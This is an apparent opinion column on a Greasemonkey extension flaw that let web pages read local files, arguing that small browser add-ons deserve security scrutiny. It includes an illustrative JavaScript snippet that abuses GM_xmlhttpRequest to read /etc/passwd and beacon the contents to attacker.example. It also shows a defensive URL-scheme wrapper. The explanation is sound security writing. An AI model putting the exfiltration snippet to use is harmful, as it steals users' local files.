Don't monkey about with security

Greasemonkey illustrates the need to treat the tiniest sliver of code with the same critical concern as the most lumbering of applications
Written by Leader, Contributor

The rise in popularity of the Mozilla Foundation's Firefox browser has seen a concomitant increase in the number of extensions available to add neat little bits of functionality. With a couple of clicks you can download everything from FlashGot, which lets you download all the links on a page with a single click, to DNSStuff Toolbar, for looking up DNS information. And they all, of course, work within your browser.

Also included in the menagerie of extensions is Greasemonkey, which uses JavaScript to let you customise the way a Web page is displayed. This week, that seemingly innocuous piece of code was found to contain a flaw that would let attackers read any file on your hard drive and list the contents of directories.
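As a rough illustration of how this class of flaw plays out, the sketch below shows what an attacking page might do if an extension's privileged request function leaked into ordinary page scope. It is an assumed reconstruction for illustration, not the published exploit; only the GM_xmlhttpRequest name comes from Greasemonkey's real API.

```javascript
// Hypothetical sketch: if a privileged helper such as GM_xmlhttpRequest
// leaks into the page's own scope, any remote page can call it with a
// file:// URL that ordinary page scripts are never allowed to read.
if (typeof GM_xmlhttpRequest === "function") {
  GM_xmlhttpRequest({
    method: "GET",
    url: "file:///etc/passwd",   // a local file, off-limits to normal pages
    onload: function (response) {
      // Exfiltrate the stolen contents to a server the attacker controls.
      new Image().src = "http://attacker.example/steal?d=" +
        encodeURIComponent(response.responseText);
    }
  });
}
```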

Many users will be dismayed to discover that an extension ("not even a real program!", they will protest) could be so dangerous. Extensions are small, some would say cute, little add-ons that we tend to download without a second thought.

Part of the problem is the widespread perception among Firefox users that their choice of browser is more secure than IE. That may well be true, but smugness breeds complacency, and that is dangerous.

Even assuming that we can trust the writers who post extensions, we can't assume that the code has been rigorously assessed for security. Many users trust Firefox itself, and the natural inclination is to confer that trust on Firefox's extensions too.

Just as users like to find the easiest way to do anything, whether that is their job or just downloading music, hackers will settle on the easiest way into a system. You can make it harder for them, but there will always be another way in.

An exploit doesn't care how it gets in. Security is stacked against the defender. You need to defend every point of entry, whereas an attacker only needs to find one way in.

There are many technical arguments about how much security to build into each part of a system, and about whether running code in a sandbox, an area isolated from the rest of the computer, can prevent attacks. Ideas like these help, but in the end useful software needs access to real resources.
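One way to reconcile the two, sketched below, is to stop handing untrusted code raw access to resources and expose a deliberately narrow wrapper instead. The function names here (makeSafeRequest, rawRequest) are hypothetical, chosen purely for illustration rather than taken from any real extension API.

```javascript
// A minimal sketch of narrowing what untrusted code can touch. Instead of
// exposing a raw, privileged request function, the host wraps it so that
// only ordinary web URLs get through.
function makeSafeRequest(rawRequest) {
  return function safeRequest(url, onload) {
    // Reject file://, chrome:// and any other non-web scheme up front.
    if (!/^https?:\/\//i.test(url)) {
      throw new Error("Blocked: only http(s) URLs are allowed");
    }
    rawRequest({ method: "GET", url: url, onload: onload });
  };
}
```

The trade-off remains, though: every capability the wrapper does let through is still a capability an attacker can try to abuse.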

In the end, it comes down to risk analysis: is this thing so useful that I'm prepared to accept the risk that it harbours an unknown flaw that could compromise what I'm doing? The tiniest piece of code must always be treated with the same critical concern as the most lumbering of applications.
